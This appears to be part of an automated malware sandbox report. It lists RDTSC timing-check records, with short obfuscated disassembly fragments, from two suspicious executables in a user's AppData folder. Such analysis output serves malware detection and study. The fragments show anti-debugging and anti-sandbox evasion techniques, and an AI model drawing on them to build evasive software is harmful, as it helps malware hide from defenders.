Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A176C4 second address: A176D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F5828CEC306h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A176D2 second address: A176EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A176EF second address: A176F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A1C156 second address: A1C166 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A1C166 second address: A1C186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC318h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A1C186 second address: A1C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A20821 second address: A2083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A22122 second address: A2213A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F5828704A66h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push esi 0x00000010 jl 00007F5828704A66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A32A44 second address: A32A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5828CEC306h 0x00000009 jnp 00007F5828CEC306h 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4ACC8 second address: A4ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AF95 second address: A4AF9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828CEC306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AF9F second address: A4AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AFA8 second address: A4AFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AFB4 second address: A4AFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AFBE second address: A4AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5828CEC316h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4B349 second address: A4B35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4B776 second address: A4B77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4B8D9 second address: A4B8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4D26C second address: A4D272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4D272 second address: A4D284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4FD68 second address: A4FD6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4FE14 second address: A4FE1E instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4FE1E second address: A4FE23 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50134 second address: A50138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50138 second address: A5013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A5013E second address: A50144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50144 second address: A50148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50148 second address: A5014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A531C6 second address: A531CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A52D9B second address: A52DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A54CDC second address: A54CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC314h 0x00000009 jc 00007F5828CEC306h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F30E64 second address: 4F30E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20DB8 second address: 4F20DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20DBC second address: 4F20DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20DC2 second address: 4F20DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F0013D second address: 4F00155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A74h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20AA7 second address: 4F20AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20AB7 second address: 4F20B1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5828704A76h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F5828704A71h 0x00000018 jmp 00007F5828704A70h 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5828704A77h 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F205DA second address: 4F205E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F205E0 second address: 4F2063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F5828704A74h 0x00000012 mov esi, 5EA6AF11h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 mov edi, esi 0x0000001b pop eax 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F5828704A74h 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Dh 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2063B second address: 4F20660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20660 second address: 4F20665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20665 second address: 4F2066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2066B second address: 4F2066F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2066F second address: 4F20690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20690 second address: 4F20696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F3002A second address: 4F30076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5828CEC311h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F5828CEC313h 0x00000018 mov eax, 34A2D30Fh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F30076 second address: 4F3007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F3007C second address: 4F300A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F300A1 second address: 4F300A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F300A5 second address: 4F300C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60E5F second address: 4F60E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A6Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F401CD second address: 4F40226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC310h 0x00000009 sub ecx, 7B117458h 0x0000000f jmp 00007F5828CEC30Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F5828CEC318h 0x0000001b or ah, FFFFFFB8h 0x0000001e jmp 00007F5828CEC30Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esp], ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40226 second address: 4F4022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4022D second address: 4F4026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC315h 0x00000009 jmp 00007F5828CEC30Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828CEC310h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4026B second address: 4F4027A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80B82 second address: 4F80BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5828704A76h 0x00000010 or eax, 78FB7C08h 0x00000016 jmp 00007F5828704A6Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5828704A76h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80BCD second address: 4F80C0B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5828CEC312h 0x00000008 xor cx, 7198h 0x0000000d jmp 00007F5828CEC30Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5828CEC310h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80C0B second address: 4F80C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80CE1 second address: 4F80CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: EDF434 second address: EDF438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: EDF438 second address: EDF43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1063639 second address: 106363F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 106363F second address: 1063649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1063D5F second address: 1063D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1063EDE second address: 1063F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5828CEC313h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F5828CEC32Dh 0x00000011 jmp 00007F5828CEC30Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828CEC30Eh 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10658C1 second address: 106594E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D2C6Bh] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D180Ah], ecx 0x00000016 push 1CF5C958h 0x0000001b push edi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F5828704A6Ah 0x00000024 popad 0x00000025 pop edi 0x00000026 xor dword ptr [esp], 1CF5C9D8h 0x0000002d xor edi, dword ptr [ebp+122D2C93h] 0x00000033 push 00000003h 0x00000035 pushad 0x00000036 mov ebx, dword ptr [ebp+122D2A7Fh] 0x0000003c mov edi, dword ptr [ebp+122D2BEBh] 0x00000042 popad 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D2BBBh] 0x0000004b mov edi, dword ptr [ebp+122D2BEBh] 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007F5828704A68h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d mov edx, dword ptr [ebp+122D1BD9h] 0x00000073 call 00007F5828704A69h 0x00000078 push eax 0x00000079 push edx 0x0000007a push ecx 0x0000007b pushad 0x0000007c popad 0x0000007d pop ecx 0x0000007e rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 106594E second address: 1065962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007F5828CEC306h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065962 second address: 1065966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065AC9 second address: 1065B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F5828CEC306h 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 599FCCE4h 0x00000017 jmp 00007F5828CEC30Ah 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D2C23h] 0x00000024 sub edi, 305AD351h 0x0000002a push 00000000h 0x0000002c add dword ptr [ebp+122D1D3Dh], edx 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F5828CEC308h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov dx, cx 0x00000051 sub esi, 1320830Ch 0x00000057 push ACA5E9A0h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065B3B second address: 1065B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065B52 second address: 1065BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 135A1660h 0x00000010 mov cx, si 0x00000013 lea ebx, dword ptr [ebp+1245A78Fh] 0x00000019 je 00007F5828CEC30Ch 0x0000001f sbb ecx, 2208CF27h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jc 00007F5828CEC306h 0x0000002f jmp 00007F5828CEC319h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065BA5 second address: 1065BC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F5828704A66h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F5828704A6Ch 0x00000015 jnp 00007F5828704A66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065C63 second address: 1065D1C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828CEC308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor cx, 1527h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 mov dword ptr [ebp+122D2877h], eax 0x0000001d pop ecx 0x0000001e push 9E482409h 0x00000023 pushad 0x00000024 jmp 00007F5828CEC313h 0x00000029 pushad 0x0000002a jmp 00007F5828CEC310h 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 popad 0x00000033 add dword ptr [esp], 61B7DC77h 0x0000003a jp 00007F5828CEC307h 0x00000040 stc 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 sub dword ptr [ebp+122D288Bh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F5828CEC308h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 call 00007F5828CEC317h 0x0000006c sub dword ptr [ebp+122D1BD9h], esi 0x00000072 pop ecx 0x00000073 jmp 00007F5828CEC30Bh 0x00000078 call 00007F5828CEC309h 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065DE9 second address: 1065DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10783A6 second address: 10783AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10783AA second address: 10783C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1052C6D second address: 1052C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5828CEC314h 0x0000000a pop esi 0x0000000b push eax 0x0000000c je 00007F5828CEC308h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 108474E second address: 1084752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084752 second address: 1084770 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828CEC319h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
